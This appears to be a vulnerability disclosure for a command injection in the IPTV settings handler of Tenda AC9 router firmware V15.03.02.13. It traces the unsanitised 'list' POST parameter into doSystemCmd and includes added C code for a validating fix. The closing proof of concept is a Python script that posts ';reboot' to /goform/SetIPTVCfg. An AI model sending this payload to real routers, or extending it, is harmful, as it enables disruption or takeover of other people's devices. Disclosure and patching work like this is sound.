Overview

Affected version

AC9 V1.0 V15.03.02.13

Vulnerability details

The Tenda AC9 V1.0 V15.03.02.13 firmware has a command injection vulnerability in the formSetIptv function. The Var variable receives the list parameter from a POST request and is later passed to the sub_B0060 function.

In function sub_B0060, the variable a1 is passed directly to system by doSystemCmd. Since the user can control the input of list, the statement doSystemCmd("nvram set adv.iptv.stballvlans=\"%s\"", a1); can cause a command injection.
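
One way to close this injection, shown as an added example that is not Tenda's code or part of the original report: validate list against a strict allowlist, then store it with an argv-based exec so that no shell parses the value. It assumes list is a comma-separated set of VLAN IDs in the range 1 to 4094 (the page does not document the format); vlan_list_is_valid, set_stb_vlans and VLAN_LIST_MAX are hypothetical names.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
#define VLAN_LIST_MAX 128 /* assumed cap on the parameter length */

/* Return 1 only for decimal VLAN IDs (1..4094) joined by single commas.
 * Any other byte (; | & $ ` " whitespace ...) rejects the whole value. */
int vlan_list_is_valid(const char *s)
{
    size_t len = s ? strlen(s) : 0;
    unsigned id = 0, digits = 0;
    if (len == 0 || len > VLAN_LIST_MAX)
        return 0;
    for (size_t i = 0; i <= len; i++) {   /* i == len visits the NUL */
        char c = s[i];
        if (c == ',' || c == '\0') {
            if (digits == 0)
                return 0;                 /* empty element */
            id = digits = 0;
            continue;
        }
        if (c < '0' || c > '9' || (digits == 0 && c == '0'))
            return 0;                     /* not a digit, or leading zero */
        id = id * 10 + (unsigned)(c - '0');
        if (++digits > 4 || id > 4094)
            return 0;
    }
    return 1;
}

/* Hypothetical replacement for the doSystemCmd() call: validate, then run
 * nvram through an argv array so no shell ever parses the value. */
int set_stb_vlans(const char *list)
{
    char kv[sizeof("adv.iptv.stballvlans=") + VLAN_LIST_MAX];
    int status;
    if (!vlan_list_is_valid(list))
        return -1;
    snprintf(kv, sizeof kv, "adv.iptv.stballvlans=%s", list);
    char *const argv[] = { "nvram", "set", kv, NULL };
    pid_t pid = fork();
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                       /* exec failed */
    }
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

Either measure alone removes the shell injection; combining them keeps malformed values out of nvram as well.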

POC

import requests

ip = "192.168.1.1"

url = f'http://{ip}/goform/SetIPTVCfg'
payload = ';reboot'

data = {"list": payload}

requests.post(url, data=data)